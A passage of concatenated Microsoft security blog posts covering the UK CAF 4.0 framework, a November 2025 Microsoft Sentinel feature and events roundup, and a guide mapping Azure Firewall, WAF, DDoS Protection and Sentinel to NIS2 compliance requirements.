automation, and collaboration. CAF 4.0 vs CAF 3.2 - What’s Changed and Why It Matters The move from CAF 3.2 to CAF 4.0 represents a fundamental shift in how the UK public sector builds cyber resilience. The focus is no longer on whether controls exist - it is on whether they work, adapt, and improve over time. CAF 4.0 puts maturity at the centre. It pushes organizations to evolve from compliance checklists to operational capability, adopting a threat-informed, intelligence-led, and proactive security posture, by design. CAF 4.0 raises the bar for cyber maturity across the public sector. It calls for departments and authorities to build on existing foundations and embrace live threat intelligence, behavioural analytics, and structured threat hunting to stay ahead of adversaries. By understanding how attackers might target essential services and adapting controls in real time, organizations can evolve from awareness to active defence. Today’s threat actors are agile, persistent, and increasingly well-resourced, which means reactive measures are no longer enough. CAF 4.0 positions resilience as a continuous process of learning, adapting, and improving, supported by data-driven insights and modern security operations. CAF 4.0 is reshaping how the UK’s public sector approaches security maturity. In the coming weeks, we’ll explore what this looks like in practice, starting with how to build a deeper understanding of threat (control A2.b) and elevate threat hunting (control C2) into an everyday capability, using the tools and insights that are available within existing Microsoft E3 and E5 licences to help support these objectives. Until then, how ready is your organization to turn insight into action?
What’s New in Microsoft Sentinel: November 2025
Welcome to our new Microsoft Sentinel blog series! We’re excited to launch a new blog series focused on Microsoft Sentinel. From the latest product innovations and feature updates to industry recognition, success stories, and major events, you’ll find it all here. This first post kicks off the series by celebrating Microsoft’s recognition as a Leader in the 2025 Gartner Magic Quadrant for SIEM 1 . It also introduces the latest innovations designed to deliver measurable impact and empower defenders with adaptable, collaborative tools in an evolving threat landscape. Microsoft is recognized as a Leader in 2025 Gartner Magic Quadrant for Security Information and Event Management (SIEM) Microsoft Sentinel continues to drive security innovation—and the industry is taking notice. Microsoft was named a leader in the 2025 Gartner Magic Quadrant for Security Information and Event Management (SIEM) 1 , published on October 8, 2025. We believe this acknowledgment reinforces our commitment to helping organizations stay secure in a rapidly changing threat landscape. Read blog for more information. Take advantage of M365 E5 benefit and Microsoft Sentinel promotional pricing Microsoft 365 E5 benefit Customers with Microsoft 365 E5, A5, F5, or G5 licenses automatically receive up to 5 MB of free data ingestion per user per day, covering key security data sources like Azure AD sign-in logs and Microsoft Cloud App Security discovery logs—no enrollment required. Read more about M365 benefits for Microsoft Sentinel. New 50GB promotional pricing To make Microsoft Sentinel more accessible to small and mid-sized organizations, we introduced a new 50 GB commitment tier in public preview, with promotional pricing starting October 1, 2025, through March 31, 2026. Customers who choose the 50 GB commitment tier during this period will maintain their promotional rate until March 31, 2027. Available globally with regional variations in regional pricing it is accessible through EA, CSP, and Direct channels. For more information see Microsoft Sentinel pricing page. Partner Integrations: Strengthening TI collaboration and workflow automation Microsoft Sentinel continues to expand its ecosystem with powerful partner integrations that enhance security operations. With Cyware, customers can now share threat intelligence bi-directionally across trusted destinations, ISACs, and multi-tenant environments—enabling real-time intelligence exchange that strengthens defenses and accelerates coordinated response. Learn more about the Cyware integration. Learn more about the Cyware integration here. Meanwhile, BlinkOps integration combined with Sentinel’s SOAR capabilities empowers SOC teams to automate repetitive tasks, orchestrate complex playbooks, and streamline workflows end-to-end. This automation reduces operational overhead, cuts Mean Time to Respond (MTTR) and frees analysts for strategic threat hunting. Learn more about the BlinkOps integration. Learn more about the BlinkOps integration. Harnessing Microsoft Sentinel Innovations Security is being reengineered for the AI era, moving beyond static, rule-based controls and reactive post-breach response toward platform-led, machine-speed defense. To overcome fragmented tools, sprawling signals, and legacy architectures that cannot keep pace with modern attacks, Microsoft Sentinel has evolved into both a SIEM and a unified security platform for agentic defense. These updates introduce architectural enhancements and advanced capabilities that enable AI-driven security operations at scale, helping organizations detect, investigate, and respond with unprecedented speed and precision. Microsoft Sentinel graph – Public Preview Unified graph analytics for deeper context and threat reasoning. Microsoft Sentinel graph delivers an interactive, visual map of entity relationships, helping analysts uncover hidden attack paths, lateral movement, and root causes for pre- and post-breach investigations. Read tech community blog for more details. Microsoft Sentinel Model Context Protocol (MCP) server – Public Preview Context is key to effective security automation. Microsoft Sentinel MCP server introduces a standardized protocol for building context-aware solutions, enabling developers to create smarter integrations and workflows within Sentinel. This opens the door to richer automation scenarios and more adaptive security operations. Read tech community blog for more details. Enhanced UEBA with New Data Sources – Public Preview We are excited to announce support for six new sources in our user entity and behavior analytics algorithm, including AWS, GCP, Okta, and Azure. Now, customers can gain deeper, cross-platform visibility into anomalous behavior for earlier and more confident detection. Read our blog and check out our Ninja Training to learn more. Developer Solutions for Microsoft Sentinel platform – Public Preview Expanded APIs, solution templates, and integration capabilities empower developers to build and distribute custom workflows and apps via Microsoft Security Store. This unlocks faster innovation, streamlined operations, and new revenue opportunities, extending Sentinel beyond out-of-the-box functionality for greater agility and resilience. Read tech community blog for more details. Growing ecosystem of Microsoft Sentinel data connectors We are excited to announce the general availability of four new data connectors: AWS Server Access Logs, Google Kubernetes Engine, Palo Alto CSPM, and Palo Alto Cortex Xpanse. Visit find your Microsoft Sentinel data connector page for the list of data connectors currently supported. We are also inviting Private Previews for four additional connectors: AWS EKS, Qualys VM KB, Alibaba Cloud Network, and Holm Security towards our commitment to expand the breadth and depth to support new data sources. Our customer support team can help you sign up for previews. New agentless data connector for Microsoft Sentinel Solution for SAP applications We’re excited to announce the general availability of a new agentless connector for Microsoft Sentinel solution for SAP applications, designed to simplify integration and enhance security visibility. This connector enables seamless ingestion of SAP logs and telemetry directly into Microsoft Sentinel, helping SOC teams monitor critical business processes, detect anomalies, and respond to threats faster—all while reducing operational overhead. Events, Webinars and Training Stay connected with the latest security innovation and best practices. From global conferences to expert-led sessions, these events offer opportunities to learn, network, and explore how Microsoft is shaping AI-driven, end-to-end security for the modern enterprise. Microsoft Ignite 2025 Security takes center stage at Microsoft Ignite, with dedicated sessions and hands-on experiences for security professionals and leaders. Join us in San Francisco, November 17–21, 2025, or online, to explore our AI-first, end-to-end security platform designed to protect identities, devices, data, applications, clouds, infrastructure—and critically—AI systems and agents. Register today! Microsoft Security Webinars Stay ahead of emerging threats and best practices with expert-led webinars from the Microsoft Security Community. Discover upcoming sessions on Microsoft Sentinel SIEM & platform, Defender, Intune, and more. Sign up today and be part of the conversation that shapes security for everyone. Learn more about upcoming webinars. Onboard Microsoft Sentinel in Defender – Video Series Microsoft leads the industry in both SIEM and XDR, delivering a unified experience that brings these capabilities together seamlessly in the Microsoft Defender portal. This integration empowers security teams to correlate insights, streamline workflows, and strengthen defenses across the entire threat landscape. Ready to get started? Explore our video series to learn how to onboard your Microsoft Sentinel experience and unlock the full potential of integrated security. Watch Microsoft Sentinel is now in Defender video series. MDTI Convergence into Microsoft Sentinel & Defender XDR overview Discover how Microsoft Defender Threat Intelligence Premium is transforming cybersecurity by integrating into Defender XDR, Sentinel, and the Defender portal. Watch this session to learn about new features, expanded access to threat intelligence, and how these updates strengthen your security posture. Partner Sentinel Bootcamp Transform your security team from Sentinel beginners to advanced practitioners. This comprehensive 2-day bootcamp helps participants master architecture design, data ingestion strategies, multi-tenant management, and advanced analytics while learning to leverage Microsoft's AI-first security platform for real-world threat detection and response. Register here for the bootcamp. Looking to dive deeper into Microsoft Sentinel development? Check out the official https://aka.ms/AppAssure_SentinelDeveloper. It’s the central reference for developers and security teams who want to build custom integrations, automate workflows, and extend Sentinel’s capabilities. Bookmark this link as your starting point for hands-on guidance and tools. Stay Connected Check back each month for the latest innovations, updates, and events to ensure you’re getting the most out of Microsoft Sentinel. 1 Gartner® Magic Quadrant™ for Security Information and Event Management, Andrew Davies, Eric Ahlm, Angel Berrios, Darren Livingstone, 8 October 2025How Azure network security can help you meet NIS2 compliance
With the adoption of the NIS2 Directive EU 2022 2555, cybersecurity obligations for both public and private sector organizations have become more strict and far reaching. NIS2 aims to establish a higher common level of cybersecurity across the European Union by enforcing stronger requirements on risk management, incident reporting, supply chain protection, and governance. If your organization runs on Microsoft Azure, you already have powerful services to support your NIS2 journey. In particular Azure network security products such as Azure Firewall, Azure Web Application Firewall WAF, and Azure DDoS Protection provide foundational controls. The key is to configure and operate them in a way that aligns with the directive’s expectations. Important note This article is a technical guide based on the NIS2 Directive EU 2022 2555 and Microsoft product documentation. It is not legal advice. For formal interpretations, consult your legal or regulatory experts. What is NIS2? NIS2 replaces the original NIS Directive 2016 and entered into force on 16 January 2023. Member states must transpose it into national law by 17 October 2024. Its goals are to: Expand the scope of covered entities essential and important entities Harmonize cybersecurity standards across member states Introduce stricter supervisory and enforcement measures Strengthen supply chain security and reporting obligations Key provisions include: Article 20 management responsibility and governance Article 21 cybersecurity risk management measures Article 23 incident notification obligations These articles require organizations to implement technical, operational, and organizational measures to manage risks, respond to incidents, and ensure leadership accountability. Where Azure network security fits The table below maps common NIS2 focus areas to Azure network security capabilities and how they support compliance outcomes. NIS2 focus area Azure services and capabilities How this supports compliance Incident handling and detection Azure Firewall Premium IDPS and TLS inspection, Threat Intelligence mode, Azure WAF managed rule sets and custom rules, Azure DDoS Protection, Azure Bastion diagnostic logs Detect, block, and log threats across layers three to seven. Provide telemetry for triage and enable response workflows that are auditable. Business continuity and resilience Azure Firewall availability zones and autoscale, Azure Front Door or Application Gateway WAF with zone redundant deployments, Azure Monitor with Log Analytics, Traffic Manager or Front Door for failover Improve service availability and provide data for resilience reviews and disaster recovery scenarios. Access control and segmentation Azure Firewall policy with DNAT, network, and application rules, NSGs and ASGs, Azure Bastion for browser based RDP SSH without public IPs, Private Link Enforce segmentation and isolation of critical assets. Support Zero Trust and least privilege for inbound and egress. Vulnerability and misconfiguration defense Azure WAF Microsoft managed rule set based on OWASP CRS. Azure Firewall Premium IDPS signatures Reduce exposure to common web exploits and misconfigurations for public facing apps and APIs. Encryption and secure communications TLS policy: Application Gateway SSL policy; Front Door TLS policy; App Service/PaaS minimum TLS. Inspection: Azure Firewall Premium TLS inspection Inspect and enforce encrypted communication policies and block traffic that violates TLS requirements. Inspect decrypted traffic for threats. Incident reporting and evidence Azure Network Security diagnostics, Log Analytics, Microsoft Sentinel incidents, workbooks, and playbooks Capture and retain telemetry. Correlate events, create incident timelines, and export reports to meet regulator timelines. NIS2 articles in practice Article 21 cybersecurity risk management measures Azure network controls contribute to several required measures: Prevention and detection. Azure Firewall blocks unauthorized access and inspects traffic with IDPS. Azure DDoS Protection mitigates volumetric and protocol attacks. Azure WAF prevents common web exploits based on OWASP guidance. Logging and monitoring. Azure Firewall, WAF, DDoS, and Bastion resources produce detailed resource logs and metrics in Azure Monitor. Ingest these into Microsoft Sentinel for correlation, analytics rules, and automation. Control of encrypted communications. Azure Firewall Premium provides TLS inspection to reveal malicious payloads inside encrypted sessions. Supply chain and service provider management. Use Azure Policy and Defender for Cloud to continuously assess configuration and require approved network security baselines across subscriptions and landing zones. Article 23 incident notification Build an evidence friendly workflow with Sentinel: Early warning within twenty four hours. Use Sentinel analytics rules on Firewall, WAF, DDoS, and Bastion logs to generate incidents and trigger playbooks that assemble an initial advisory. Incident notification within seventy two hours. Enrich the incident with additional context such as mitigation actions from DDoS, Firewall and WAF. Final report within one month. Produce a summary that includes root cause, impact, and corrective actions. Use Workbooks to export charts and tables that back up your narrative. Article 20 governance and accountability Management accountability. Track policy compliance with Azure Policy initiatives for Firewall, DDoS and WAF. Use exemptions rarely and record justification. Centralized visibility. Defender for Cloud’s network security posture views and recommendations give executives and owners a quick view of exposure and misconfigurations. Change control and drift prevention. Manage Firewall, WAF, and DDoS through Network Security Hub and Infrastructure as Code with Bicep or Terraform. Require pull requests and approvals to enforce four eyes on changes. Network security baseline Use this blueprint as a starting point. Adapt to your landing zone architecture and regulator guidance. Topology and control plane Hub and spoke architecture with a centralized Azure Firewall Premium in the hub. Enable availability zones. Deploy Azure Bastion Premium in the hub or a dedicated management VNet; peer to spokes. Remove public IPs from management NICs and disable public RDP SSH on VMs. Use Network Security Hub for at-scale management. Require Infrastructure as Code for all network security resources. Web application protection Protect public apps with Azure Front Door Premium WAF where edge inspection is required. Use Application Gateway WAF v2 for regional scenarios. Enable the Microsoft managed rule set and the latest version. Add custom rules for geo based allow or deny and bot management. enable rate limiting when appropriate. DDoS strategy Enable DDoS Network Protection on virtual networks that contain internet facing resources. Use IP Protection for single public IP scenarios. Configure DDoS diagnostics and alerts. Stream to Sentinel. Define runbooks for escalation and service team engagement. Firewall policy Enable IDPS in alert and then in alert and deny for high confidence signatures. Enable TLS inspection for outbound and inbound where supported. Enforce FQDN and URL filtering for egress. Require explicit allow lists for critical segments. Deny inbound RDP SSH from the internet. Allow management traffic only from Bastion subnets or approved management jump segments. Logging, retention, and access Turn on diagnostic settings for Firewall, WAF, DDoS, and Application Gateway or Front Door. Send to Log Analytics and an archive storage account for long term retention. Set retention per national law and internal policy. Azure Monitor Log Analytics supports table-level retention and archive for up to 12 years, many teams keep a shorter interactive window and multi-year archive for audits. Restrict access with Azure RBAC and Customer Managed Keys where applicable. Automation and playbooks Build Sentinel playbooks for regulator notifications, ticket creation, and evidence collection. Maintain dry run versions for exercises. Add analytics for Bastion session starts to sensitive VMs, excessive failed connection attempts, and out of hours access. Conclusion Azure network security services provide the technical controls most organizations need in order to align with NIS2. When combined with policy enforcement, centralized logging, and automated detection and response, they create a defensible and auditable posture. Focus on layered protection, secure connectivity, and real time response so that you can reduce exposure to evolving threats, accelerate incident response, and meet NIS2 obligations with confidence. References NIS2 primary source Directive (EU) 2022/2555 (NIS2). https://eur-lex.europa.eu/eli/dir/2022/2555/oj/eng Azure Firewall Premium features (TLS inspection, IDPS, URL filtering). https://learn.microsoft.com/en-us/azure/firewall/premium-features Deploy & configure Azure Firewall Premium. https://learn.microsoft.com/en-us/azure/firewall/premium-deploy IDPS signature categories reference. https://learn.microsoft.com/en-us/azure/firewall/idps-signature-categories Monitoring & diagnostic logs reference. https://learn.microsoft.com/en-us/azure/firewall/monitor-firewall-reference Web Application Firewall WAF on Azure Front Door overview & features. https://learn.microsoft.com/en-us/azure/frontdoor/web-application-firewall WAF on Application Gateway overview. https://learn.microsoft.com/en-us/azure/web-application-firewall/overview Examine WAF logs with Log Analytics. https://learn.microsoft.com/en-us/azure/application-gateway/log-analytics Rate limiting with Front Door WAF. https://learn.microsoft.com/en-us/azure/web-application-firewall/afds/waf-front-door-rate-limit Azure DDoS Protection Service overview & SKUs (Network Protection, IP Protection). https://learn.microsoft.com/en-us/azure/ddos-protection/ddos-protection-overview Quickstart: Enable DDoS IP Protection. https://learn.microsoft.com/en-us/azure/ddos-protection/manage-ddos-ip-protection-portal View DDoS diagnostic logs (Notifications, Mitigation Reports/Flows). https://learn.microsoft.com/en-us/azure/ddos-protection/ddos-view-diagnostic-logs Azure Bastion Azure Bastion overview and SKUs. https://learn.microsoft.com/en-us/azure/bastion/bastion-overview Deploy and configure Azure Bastion. https://learn.microsoft.com/en-us/azure/bastion/tutorial-create-host-portal Disable public RDP and SSH on Azure VMs. https://learn.microsoft.com/en-us/azure/virtual-machines/security-baseline Azure Bastion diagnostic logs and metrics. https://learn.microsoft.com/en-us/azure/bastion/bastion-diagnostic-logs Microsoft Sentinel Sentinel documentation (onboard, analytics, automation). https://learn.microsoft.com/en-us/azure/sentinel/ Azure Firewall solution for Microsoft Sentinel. https://learn.microsoft.com/en-us/azure/firewall/firewall-sentinel-overview Use Microsoft Sentinel with Azure WAF. https://learn.microsoft.com/en-us/azure/web-application-firewall/waf-sentinel Architecture & routing Hub‑spoke network topology (reference). https://learn.microsoft.com/en-us/azure/architecture/networking/architecture/hub-spoke Azure Firewall Manager & secured virtual hub. https://learn.microsoft.com/en-us/azure/firewall-manager/secured-virtual-hub
